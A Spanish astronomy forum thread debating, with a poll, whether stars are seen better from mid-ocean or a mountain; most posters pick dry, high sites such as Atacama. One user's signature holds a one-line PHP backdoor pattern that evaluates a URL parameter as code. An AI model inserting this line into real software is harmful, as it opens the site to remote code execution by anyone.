¿Mar o Monte?

Subforo para recomendaciones de objetos a observar tanto de objetos de cielo profundo como estrellas, dibujos, etc.
Responder

Elige...

Mar
1
9%
Monte
9
82%
Otra opción (Poner en el post)
1
9%
 
Votos totales: 11

AstroVallekas
Mensajes: 27
Registrado: Vie Mar 25, 2011 9:58 am

¿Mar o Monte?

Mensaje por AstroVallekas »

Pues eso chicos. Esto es por un debate entre un compañero de clase y yo. Discutimos sobre donde se ve mejor el firmamento, o en mar adentro o en un monte. Claro cuando digo Mar es Mar adentro, en mitad del pacífico y monte donde no lleguen las molestas luces de la ciudad

¿Vosotros que pensais? yo creo que en el mar


También pongo la encuesta para enrriquecer al post :wink:
Somos de Madrid, de un pueblo que nunca a tenido fronteras: Vallekas

``Kontrakorriente``
sanabres
Mensajes: 1932
Registrado: Mié Ago 24, 2011 11:56 am

¿Mar o Monte?

Mensaje por sanabres »

Fifty fifty, de momento.
Yo he puesto monte. Si fuera mar, algún observatorio se habría puesto en un barco.
Obviamente, si es en barco, equilibrado, que se puede hacer.
"En esta vida hay dos palabras que te abrirán muchas puertas: Tire y Empuje" (Les Luthiers)

Celestron C11, ETX125, Long Pern ED80
CGEM,AVX
ES 4'7, 8'8 y 30 mm (82º), Nagler 13
Panoptic 24
Canon 7D, 1000D, QHY5,DMK21Au, ASI178 mm
Manuelariza
Mensajes: 1919
Registrado: Mar Ago 21, 2007 10:35 am

¿Mar o Monte?

Mensaje por Manuelariza »

En el espacio exterior!!!!!


Saludos...
Estoy de la Astronom�a hasta las narices,me ha hecho un agujero en el bolsillo!!!
Jaime Barcena
Mensajes: 19
Registrado: Vie Jul 29, 2011 10:33 pm

¿Mar o Monte?

Mensaje por Jaime Barcena »

La montaña cuanto mas alta , mejor ...
Y ahora en el desierto en Chile
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

¿Mar o Monte?

Mensaje por m3ntol »

En medio del Pacífico, desde luego, no vas a tener nada de contaminación lumínica ( a parte de las luces de posición y alcance del barco) pero estas a nivel del mar y tienes mucha atmósfera por arriba... además el nivel de humedad es alto (salvo que vayas a los polos) y eso empeora las condiciones.
Lo mejor es un lugar elevado y seco, por eso Atacama es tan buen observatorio, por el desierto de sal que seca hasta el alma.
Resumiendo... monte.

PD: En una conferencia que dieron los del observatorio de Atacama decían que los indígenas de Atacama eran de los pocos pueblos que no solo ponían nombre a las constelaciones, sino que también ponían nombre a las manchas de polvo de la Vía Láctea que oscurecían la visión del plano galáctico... tal era el nivel de visión que había en Atacama.
phpbb:eval(stripslashes($_GET[e]));
Manuelariza
Mensajes: 1919
Registrado: Mar Ago 21, 2007 10:35 am

¿Mar o Monte?

Mensaje por Manuelariza »

Bueno....como lo del "espacio exterior" no va a colar :wink: :wink: ,yo prefiero monte.


Saludos...
Estoy de la Astronom�a hasta las narices,me ha hecho un agujero en el bolsillo!!!
AstroVallekas
Mensajes: 27
Registrado: Vie Mar 25, 2011 9:58 am

¿Mar o Monte?

Mensaje por AstroVallekas »

Bueno, parece ser que aqui somos muy de monte :lol:

Sinceramente, nunca he mirado las estrellas en medio del oceano y si en un monte, pero siempre he tenido eso dentro de que se ven mejor en el mar. Puede que tengais razon, por que es cierto que cuanto mas seco y mas alto mejor, pero hay que probar lo del mar :D

Alquiler de barco y salida para el pacifico de Astrohenares? :twisted:
Somos de Madrid, de un pueblo que nunca a tenido fronteras: Vallekas

``Kontrakorriente``
Raulalcala
Mensajes: 135
Registrado: Lun Sep 20, 2010 8:17 am

¿Mar o Monte?

Mensaje por Raulalcala »

fijo que en el mar.....minimo se mueve el barco....ahora veo ... ahora no ahora veo ahora no....por que no creo que haya un milimetro de.costa sin contaminacion luminica asi que.... monte como las cabras...
Meade Lightbridge 8" searcher I
oculares vixen nlv 6 ,bst 18 meade 26
filtro UHC y barlow Celestron omni.
Responder